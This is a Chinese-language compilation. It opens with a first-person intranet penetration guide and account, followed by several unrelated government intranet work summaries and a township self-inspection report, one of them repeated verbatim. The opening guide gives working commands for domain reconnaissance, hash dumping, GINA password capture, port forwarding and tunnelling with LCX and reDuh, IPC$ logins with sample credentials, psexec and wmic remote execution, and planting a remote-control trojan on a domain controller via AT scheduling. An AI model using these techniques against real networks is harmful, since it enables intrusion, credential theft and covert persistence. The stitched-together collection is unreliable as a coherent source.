第一篇:内网渗透常用命令
1.收集信息。
1-1.无论是什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。
既然有了他的机器,那么翻翻他的电脑这是必要的,如果你说要怎么翻,你可以尝试熟悉他的电脑甚至比他本人还熟,那你就算了解详细了。一台个人用的电脑,从上面翻出与他自己相关的一些信息,和大量公司信息应该是没有问题的,除非,这是台新电脑。
1-2.了解了一定的人员信息,期间你要记下你所掌握到的账号,密码这些重要数据,以后有一定的用,所以,在你渗之前,不妨建个记事本将重要信息保存起来,写个记事本不会浪费你多少时间。接下来,我们就应该对这个网络进行一定的了解,他是一般的内网,还是域?一般大公司都会用域的,我们只需要查一下就知道,要想对他进行渗透,你就必须了解他的网络拓补,当然,一些太具体的物理上我们是无法了解的,我们只能了解我们所能知道的。不管他是INT,DMZ,LAN,我们必须足够掌握。在这,我们就会用到一定的命令,相信大家应该都很熟悉。
ipconfig /all 查询一下本机的一些情况,IP段 网关 属于不属于域
net view 查询一些存在联系的机器,一般以机器名显示,我们需要对其PING出IP,一是方便查询哪些重要机器的IP,二是方便查询存在几个段
net view /domain 查询有几个域 因为大型网络里面一般不止一个域的 net group /domain 查询域里面的组 net user /domain 查询域用户
net group “domain admins” /domain 查询域管理用户组
这些都是我们需要了解的,当然有时候还会需要再查询一些信息,NET命令下你们都会找到,不需要我再重复,具体的情况具体分析问题。
2.信息归档
2-1。有了信息,我们就要对信息进行一定的归档,将每个机器名所对应的IP归档,方便用时不会乱。2-2。查询出的用户,管理员,我们也必须归档。
2-3。查询信息时可能出现的有利用价值信息必须归档。3.技术利用
3-1。不论是通过键盘记录。或者HASH的抓取,我们需要将账号,密码,邮箱,凡是涉及关键数据的全部保存,一方面是准备渗透的资料,二是防止当前利用机器会掉。3-1-1。利用远控的键盘记录进行抓取。
3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH,然后破解。GETHASHES V1.4后 可以抓取域的全部HASH。3-1-3。用GINASTUB.DLL获取管理员的账号和密码。因为域管理员有权限登陆任何一台机器。种上这个只是方便记录他所登陆的密码。INSTALL后,会在SYSYTEM32下生成一个 FAXMODE.INC 文件记录密码。
3-2。有了内网,很多东西我们是没有必要直接在当前利用机器上操作的,别人虽然是内网,但是不代表他没有防御系统,所以,我们建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都会了吧。
3-2-1。我在这推荐 VIDC 这个工具,很方便,在CMD下直接操 VIDC.EXE-D-P PORT 就可以了。
3-2-2。在利用机器上使用LCX,CMD下 LCX.EXE-SLAVE 服务器IP PORT 127.0.0.1 PORT,然后到服务器上 CMD下 LCX.EXE-LISTEN 服务器IP PORT 任意PORT。
3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接,成功连接后该操作什么就看你们自己了。
基本上我们就只能操作这么多了,后面已经没有什么技术上的再使用或利用,但是这中间的经验不少,所需要处理的细节也不少。
我们在得到内网机器后,如果他存在域,但是没有使用域账号怎么办?那我们只能查询或者想尽一切手段获得他常用的账号密码,然后利用这个账号密码,再通过SOCKS进入域。这其中就关系到各位同行查看控制机器的文件,还有记录密码,GINA,HASH破解,这些都是必须的。
进入域后,我们又该怎么做,建立SOCKS后又该怎么做。我们可以扔S上去查看主要的端口,我们可以对端口进行弱口令的尝试,我们可以针对内网的WEB进行检测,方式很多,甚至你可以用MS08-067对另一台机器进行突破,但是相信我,能使用域的机器,大部分都是补丁打齐的。我们能利用的很少,但是不能灰心,只要能在内网穿梭,我们至少在防御上会轻松很多,我们需要的只是耐心和时间。
一旦拥有密码,我们就可以尝试IPC连接,直接拿下域,这就得看你们的权限有多大。net use IPipc$ password /user:username@domain 推荐使用这样的方式输入账号和密码,为什么?如果用户名存在空格,你这样输会保险些。什么 域用户不能存在空格? 是的,以前我也认为不会,微软的讲师也说不会,不过,经过我的测试和经验,那是假的,域 完全可以空格,除了 user name 这样的,还可以存在 user na me,不信 你可以试试。
建立IPC后,你只是想COPY文件 或者 RAR文件 再或者种马 那就是你的自由了。
后话:最近因为在渗域,在渗透过程中,也确实出现一些问题,几次都是不知如何进行,其实在技术上,并没有什么障碍。主要是在于对方有着比较强的主防御,而我的远控最开始连CMD都无法执行,后经过几天的环境测试,突破了CMD。有了CMD后,进行了查询,获得了一些信息,就开始了往下的渗透,被控机器的密码我不是跑出来的,我是翻他的文件翻出他常用密码的。因为他没有使用域账号,都是以系统账号登陆,所以无法查看域。我只能用他的域账号建立IPC连接,查找到内网的一个WEB服务,将其渗透后才算拿下了一个稳定的内网机器。
拿下内网WEB服务器后,我就已经完全在域内,没有使用HASH INJECTION,我是先查询了DOMAIN ADMINS,发现WEB服务器上的账号就属于这个组,PW后得到了HASH,破解掉我就连向了域控服务器的IPC$。
连接了IPC$,直接在其SYSYTEM32下扔了一个远控,然后用AT命令将其启动,这期间我尝试了5个SHIFT,但是SHIFT关闭后,我的远控也会掉,所以排除了这种方法,还是用AT来ADD NEW JOB 比较方便。
给域控服务器种了远控,利用CMD来GETHASHES了全部的HASHES进行破解,很幸运的查到了文件管理组的用户,这才有了我后面的目标达成。
总的来说,我这次的渗透比较运气好,中间麻烦事不是太多,不过也花了半个月的时间,时间大部分花在测试防御环境,软件免杀,木马免杀,查找资料这些上面。
后来,我获取了他的网络拓补图,发现我所呆的区域只是一个小小的域,还有好几个域我还没有涉及到,在域的前面是DMZ,而DMZ前面当然是INT了。
已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来。常用命令
net view 查看同一域/工作组的计算机列表
net view /domain 查看域/工作组列表
net view /domain:Secwing 查看Secwing域中 计算机列表
net group /domain 查看所在域的组
net user /domain 查看所在域用户
net user /domain zerosoul 12345678 修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限
net localgroup administrators SECWINGzerosoul /add 域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行
下面的命令 只能用于 域控制器:
net group “Domain controllers” 查看域控制器(如果有多台)
net group 查看域的组
net group “domain admins” 查看域管理员
net group “domain users” 查看域管理员
PS:打开配置域控制器向导的命令 dcpromo
psexec /accepteula 绕过第一次验证窗口 mstsc/admin 解决hash无法抓出问题
wmic /node:172.16.19.96 /user:ABIMAQAdministrator /password:k78m90 process call create c:kav2009.exe psexec.exe-s-u administrator-p k78m90 172.16.16.2-c c:kav2009.exe 拷贝文件并且执行 psexec.exe-s-u administrator-p km3h7i 172.16.16.2-c c:kavgsecdump.exe-u 抓取hash net use 172.16.16.2IPC$ “k78m90” /user:“admintitrator” net use 172.16.16.2IPC$ “k78m90” /user:“aABIMAQAdministrator” net time 172.16.16.2 at 172.16.16.2 13:50 2009.exe
java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令 [createTunnel]1234:127.0.0.1:3389 端口转向命令
iam-alt-h user-hash 这样hash就被注入了 whosthere-alt.exe 来查看是否被注入成功。
第二篇:2010内网工作总结
成都市金牛区人民检察院
2010年电子政务内网工作总结
2010年,我院以贯彻落实《全市2010年电子政务内网目标工作任务》()和《金牛区2010年电子政务内网工作目标考核办法》(金内网办发[2010]2号)的文件要求为落脚点,以切实提高网上办公应用和网络安全保障能力为重点,突出内网办公体系建设和网络安全体系建设,从加大宣传教育培训力度,强化督促管理机制入手,围绕服务和保障检察工作大局,全面推进内网建设与管理工作。现将我院2010内网工作总结如下:
一、加强组织领导,落实管理责任,充分发挥内网的职能作用
坚持“谁主管,谁负责;谁管理,谁负责”的网络管理责任制,落实分管领导、责任科室和专(兼)职人员。同时,克服各种困难,在警力、经费等方面切实保障内网工作的需要。
(一)认真贯彻执行上级电子政务内网的相关文件、会议精神,健全了网络管理和工作机制。明确由副检察长谢明安分管此项工作,办公室主任负责日常管理工作的领导。应用操作、信息维护及设备维修等均配备了专(兼)职人员负责。做到了人员到位,责任明确,工作落实。
(二)积极组织内网操作、信息维护等相关人员参加市、区内网管理办公室举办的各类应用技能培训或相关会议,以及时掌握新要求、新方法、新技术,不断提升应用技能。
(三)克服警力不足的困难,保证了内网操作人员的固定;在经费较为紧张的情况下,仍加大了电子政务内网基础建设所需的设备经费,保障了电子政务内网服务机关办公、办案的积极作用的充分发挥。
二、强化制度落实,完善网络的规范管理
严格遵守公文网上交换、资料管理、信息维护和设备维修等相关的工作要求,狠抓公文网上交换、领导审签制度、网络管理制度等规章制度的落实,做到网上公文交换规范,信息维护及时。
(一)搞好公文网上单轨运行,认真做好公文网上交换、处理、归档和查阅、电子邮箱等工作的网上应用,建立和完善信息上网制度,开展了在检察内网办案、文秘、信息、督查和检察机关事务管理的网上办公,建立基础数据库和重要信息资源库,及时为领导决策提供有价值的信息。
(二)认真做好电子政务内网上的公文收发,有固定人员,按照两个阶段,四个时间下载各类文件资料。操作人员能正确、熟练地做好本单位的公文网上信息网上应用。今年已从内网接收、发送、下载各类文件、资料2100余份,未出任何差错。按照区档案的要求做好公文网上归档和查阅工
作,实现了公文的高效运行。同时,利用电子政务内网资源,将“金牛要情”、“金牛观察”、“金牛人大”等栏目的重要信息及时在本院检察专网转发,实时传递区委、区政府、区人大的重要决策,提供了高效的信息服务。
(三)按照实物印章的管理办法,严格管理电子印章,制定和完善了公文网上交换工作制度、领导审签制度、安全保密制度、网络管理等制度。加强电子公文制作、印发、传递、使用、保存、销毁过程中安全管理工作。并按要求每天填写电子政务内网收发电子邮件的登记和值班日记。
三、完善管理体系,确保网络安全
从建立健全信息和网络安全保密制度,落实管理责任制,推行全员网络安全教育,规范网络终端设备使用维护管理,强化督促检查等方面入手,狠抓网络与信息安全的体系建设,保障了网络安全。
(一)依据国家有关涉密信息系统管理办法和技术规范,认真抓好电子政务内网、检察专网及局域网的安全保密体系建设,开通了网上举报系统和视频会议系统,为办公、办案信息化提供了更完善的硬件保障,做到了党政网、检察内网、互联网“三网”间的物理隔离和专机专用,安装了防病毒系统、建设网络信息安全监控系统,做到软件及时升级、打补丁、更新病毒库。使电子政务内网、检察专网、互联网可管并可控,达到了网络安全保密要求。全年无失泄密事件,无重要数据丢失现象发生。
(二)积极开展网络安全保密宣传教育和督促检查工作。今年我院深入开展网络安全保密教育,增强了业务部门干警的安全意识和责任意识。落实了责任制,上网发布信息必须由各部门分管检察长和办公室主任审核和监控,按要求配置了必要的设备,并定期和不定期由院纪检组、办公室、计财科、技术科组成检查组对各部门计算机进行检查。确保了电子公文安全、可靠、准确的传递和使用。
(三)建立健全网络运行维护制度,按照“谁主管,谁负责”的原则,建立健全安全保密规章制度,落实安全责任制、责任事件八小时内报告制和泄密责任追究制。重申在安全保密措施未完全到位的情况下,不得一台计算机同时上两个网络,不得在网上传输涉密公文,不得将涉密公文(信息)变为非涉密的公文(信息)在党政网上传输或发布,做到“上网不涉密、涉密不上网”,做到了发现问题及时解决,进一步增强了电子网络办公的稳定性、可靠性、快速性和安全性。
2011年,我院将从内网工作的组织领导、网络管理应用和网络安全三个方面着力,不断加强内网建设管理工作;强化管理、应用和安全三个体系建设,确保信息渠道畅通,网络资源利用充分,公文信息交换安全可靠。
二○一○年十二月二十日
第三篇:2010内网工作总结
成都市金牛区人民检察院 2010年电子政务内网工作总结
2010年,我院以贯彻落实《全市2010年电子政务内网目标工作任务》()和《金牛区2010年电子政务内网工作目标考核办法》(金内网办发[2010]2号)的文件要求为落脚点,以切实提高网上办公应用和网络安全保障能力为重点,突出内网办公体系建设和网络安全体系建设,从加大宣传教育培训力度,强化督促管理机制入手,围绕服务和保障检察工作大局,全面推进内网建设与管理工作。现将我院2010内网工作总结如下:
一、加强组织领导,落实管理责任,充分发挥内网的职能作用
坚持“谁主管,谁负责;谁管理,谁负责”的网络管理责任制,落实分管领导、责任科室和专(兼)职人员。同时,克服各种困难,在警力、经费等方面切实保障内网工作的需要。
(一)认真贯彻执行上级电子政务内网的相关文件、会议精神,健全了网络管理和工作机制。明确由副检察长谢明安分管此项工作,办公室主任负责日常管理工作的领导。应用操作、信息维护及设备维修等均配备了专(兼)职人员负责。做到了人员到位,责任明确,工作落实。
(二)积极组织内网操作、信息维护等相关人员参加市、区内网管理办公室举办的各类应用技能培训或相关会议,以及时掌握新要求、新方法、新技术,不断提升应用技能。
(三)克服警力不足的困难,保证了内网操作人员的固定;在经费较为紧张的情况下,仍加大了电子政务内网基础建设所需的设备经费,保障了电子政务内网服务机关办公、办案的积极作用的充分发挥。
二、强化制度落实,完善网络的规范管理
严格遵守公文网上交换、资料管理、信息维护和设备维修等相关的工作要求,狠抓公文网上交换、领导审签制度、网络管理制度等规章制度的落实,做到网上公文交换规范,信息维护及时。
(一)搞好公文网上单轨运行,认真做好公文网上交换、处理、归档和查阅、电子邮箱等工作的网上应用,建立和完善信息上网制度,开展了在检察内网办案、文秘、信息、督查和检察机关事务管理的网上办公,建立基础数据库和重要信息资源库,及时为领导决策提供有价值的信息。
(二)认真做好电子政务内网上的公文收发,有固定人员,按照两个阶段,四个时间下载各类文件资料。操作人员能正确、熟练地做好本单位的公文网上信息网上应用。今年已从内网接收、发送、下载各类文件、资料2100余份,未出任何差错。按照区档案的要求做好公文网上归档和查阅工作,实现了公文的高效运行。同时,利用电子政务内网资源,将“金牛要情”、“金牛观察”、“金牛人大”等栏目的重要信息及时在本院检察专网转发,实时传递区委、区政府、区人大的重要决策,提供了高效的信息服务。
(三)按照实物印章的管理办法,严格管理电子印章,制定和完善了公文网上交换工作制度、领导审签制度、安全保密制度、网络管理等制度。加强电子公文制作、印发、传递、使用、保存、销毁过程中安全管理工作。并按要求每天填写电子政务内网收发电子邮件的登记和值班日记。
三、完善管理体系,确保网络安全
从建立健全信息和网络安全保密制度,落实管理责任制,推行全员网络安全教育,规范网络终端设备使用维护管理,强化督促检查等方面入手,狠抓网络与信息安全的体系建设,保障了网络安全。
(一)依据国家有关涉密信息系统管理办法和技术规范,认真抓好电子政务内网、检察专网及局域网的安全保密体系建设,开通了网上举报系统和视频会议系统,为办公、办案信息化提供了更完善的硬件保障,做到了党政网、检察内网、互联网“三网”间的物理隔离和专机专用,安装了防病毒系统、建设网络信息安全监控系统,做到软件及时升级、打补丁、更新病毒库。使电子政务内网、检察专网、互联网可管并可控,达到了网络安全保密要求。全年无失泄密事件,无重要数据丢失现象发生。
(二)积极开展网络安全保密宣传教育和督促检查工作。今年我院深入开展网络安全保密教育,增强了业务部门干警的安全意识和责任意识。落实了责任制,上网发布信息必须由各部门分管检察长和办公室主任审核和监控,按要求配置了必要的设备,并定期和不定期由院纪检组、办公室、计财科、技术科组成检查组对各部门计算机进行检查。确保了电子公文安全、可靠、准确的传递和使用。
(三)建立健全网络运行维护制度,按照“谁主管,谁负责”的原则,建立健全安全保密规章制度,落实安全责任制、责任事件八小时内报告制和泄密责任追究制。重申在安全保密措施未完全到位的情况下,不得一台计算机同时上两个网络,不得在网上传输涉密公文,不得将涉密公文(信息)变为非涉密的公文(信息)在党政网上传输或发布,做到“上网不涉密、涉密不上网”,做到了发现问题及时解决,进一步增强了电子网络办公的稳定性、可靠性、快速性和安全性。
2011年,我院将从内网工作的组织领导、网络管理应用和网络安全三个方面着力,不断加强内网建设管理工作;强化管理、应用和安全三个体系建设,确保信息渠道畅通,网络资源利用充分,公文信息交换安全可靠。
二○一○年十二月二十日
第四篇:2009内网工作总结
2009年成都市金牛区人民检察院
电子政务内网工作总结
2009年,我院对加强和搞好电子政务内网(党政网)工作高度重视,严格按照成都市金牛区电子政务内网建设管理办公室关于《金牛区2009年电子政务内网工作目标考核办法》(金内网办[2009]1号)的要求,结合我院网络工作和检察业务工作的实际,扎实推进信息化工作的开展。积极探索信息化工作管理的新思路、新举措,突出内网办公体系建设与应用,强化信息服务,落实安全保密措施,加大宣传教育培训力度,加强督促检查,为保障我院信息渠道的畅通、信息资源的利用和服务,进一步提高办公、办案自动化应用水平起到了重要作用。
一、加强领导,落实责任,提升技能,做实保障,以充分发挥内网的职能作用
落实分管领导、责任科室和专(兼)职人员,坚持“谁主管,谁负责;谁管理,谁负责”,推进网络管理责任制的落实。同时,克服各种困难,在警力、经费等方面切实保障内网工作的需要。
(一)认真贯彻执行上级电子政务内网的相关文件、会议精神,健全了网络管理和工作机制。明确由副检察长谢明安分管此项工作,办公室主任负责日常管理工作的领导。应用操作、信息维护及设备维修等均配备了专(兼)职人员负责。做到了人员到位,责任明确,工作落实。
(二)积极组织内网操作、信息维护等相关人员参加市、区内网管理办公室举办的各类应用技能培训或相关会议,以及时掌握新要求、新方法、新技术,不断提升应用技能。
(三)克服警力不足的困难,保证了内网操作人员的固定;在经费较为紧张的情况下,仍加大了电子政务内网基础建设所需的设备经费,保障了电子政务内网服务机关办公、办案的积极作用的充分发挥。
二、强化制度落实,完善网络的规范管理
严格遵守公文网上交换、资料管理、信息维护和设备维修等相关的工作要求,狠抓公文网上交换、领导审签制度、网络管理制度等规章制度的落实,做到网上公文交换规范,信息维护及时。
(一)搞好公文网上单轨运行,认真做好公文网上交换、处理、归档和查阅、电子邮箱等工作的网上应用,建立和完善信息上网制度,开展了在检察内网办案、文秘、信息、督查和检察机关事务管理的网上办公,建立基础数据库和重要信息资源库,及时为领导决策提供有价值的信息。
(二)认真做好电子政务内网上的公文收发,有固定人员,按照两个阶段,四个时间下载各类文件资料。操作人员能正确、熟练地做好本单位的公文网上信息网上应用。今年已从电子网上接收、发送、下载各类文件、资料XXX余份,做好公文网上归档和查阅工作,实现公文高效运行,充分利用电子政务内网为本机关提供服务,简化了办事流程,提高了办公效率,为领导的决策及时提供依据。
(三)认真管理电子印章并严格遵守各项规章制度,制定和完善公文网上交换工作制度、领导审签制度、安全保密制度、网络管理等制度。加强电子公文制作、印发、传递、使用、保存、销毁过程中安全管理工作。并按要求每天填写电子政务内网收发电子邮件的登记和值班日记。
三、抓好体系建设,确保网络安全
从建立健全信息和网络安全保密制度,落实管理责任制,推行全员网络安全教育,规范网络终端设备使用维护管理,强化督促检查等方面入手,狠抓网络与信息安全的体系建设,保障了网络安全。
(一)依据国家有关涉密信息系统管理办法和技术规范,认真抓好电子政务内网、检察专网及局域网的安全保密体系建设,开通了网上举报系统和视频会议系统,为办公、办案信息化提供了更完善的硬件保障,做到了党政网、检察内网、互联网“三网”间的物理隔离和专机专用,安装了防病毒系统、建设网络信息安全监控系统,做到软件及时升级、打补丁、更新病毒库。使电子政务内网、检察专网、互联网可管并可控,达到了网络安全保密要求。全年无失泄密事件,无重要数据丢失现象发生。
(二)积极开展网络安全保密宣传教育和督促检查工作。今年我院深入开展网络安全保密教育,增强了业务部门干警的安全意识和责任意识。落实了责任制,上网发布信息必须由各部门分管检察长和办公室主任审核和监控,按要求配置了必要的设备,并定期和不定期由院纪检组、办公室、计财科、技术科组成检查组对各部门计算机进行检查。确保了电子公文安全、可靠、准确的传递和使用。
(三)建立健全网络运行维护制度,按照“谁主管,谁负责”的原则,建立健全安全保密规章制度,落实安全责任制、责任事件八小时内报告制和泄密责任追究制。重申在安全保密措施未完全到位的情况下,不得一台计算机同时上两个网络,不得在网上传输涉密公文,不得将涉密公文(信息)变为非涉密的公文(信息)在党政网上传输或发布,做到“上网不涉密、涉密不上网”,做到了发现问题及时解决,进一步增强了电子网络办公的稳定性、可靠性、快速性和安全性。
2010年,我院将从内网工作的组织领导、网络管理应用和网络安全三个方面着力,不断加强内网工作;强化管理、应用和安全三个体系建设,确保信息渠道畅通,网络资源利用充分,公文信息交换安全可靠。
二○○九年十二月二十日
第五篇:党政内网自查报告
坊前镇党政内网安全管理工作
自查报告
为进一步加强党政内网管理,切实做好莒南县电子政务专网的网络信息安全工作,根据上级统一安排,在全镇党政机关进行了一次党政内网网络信息安全管理工作的专项检查。
一、检查范围
本次检查范围是坊前镇党政机关接入党政内网的所有计算机。
二、检查结果
本次共检查全镇接入党政内网的5台计算机,占应查计算机的100%。
(一)规章制度。党政内网各项安全管理规章制度,如商用密码通信安全保密规定、商用密码通信机房管理规定等都已上墙。党政内网计算机都固定了专人管理操作。
(二)人员管理。所有党政内网计算机管理操作人员都签署了保密承诺书,进行了保密知识培训,确定专人负责党政内网和终端设备的安全管理。专网管理人员定时对相关网络设备进行巡检工作,制订了应急预案,及时排除故障隐患,确保专网网络安全通畅。对外来技术服务人员加强安全保密管理,制订并落实了相关保密措施及保密协议。
(三)设备管理。党政内网与国际互联网等其它网络实
现完全物理隔离,配备专用优盘、刻录机等移动存储介质和设备,所有党政内网计算机安装了外联监控软件和杀毒软件,设置了开机口令,无无线外围设备,党政内网设备都由指定人员维修,报废党政内网设备和计算机都由县回收处理。
三、存在问题
1、部分电脑安装了盗版的Windows Office软件;
2、部分电脑安装的杀毒软件的病毒库更新不及时。
四、整改措施
1、对安装了盗版软件的电脑,立即责令电脑管理人员卸载盗版软件,安装正版软件。
2、加强对电脑管理人员、操作人员的管理和教育,及时更新病毒库。
二○一一年九月九日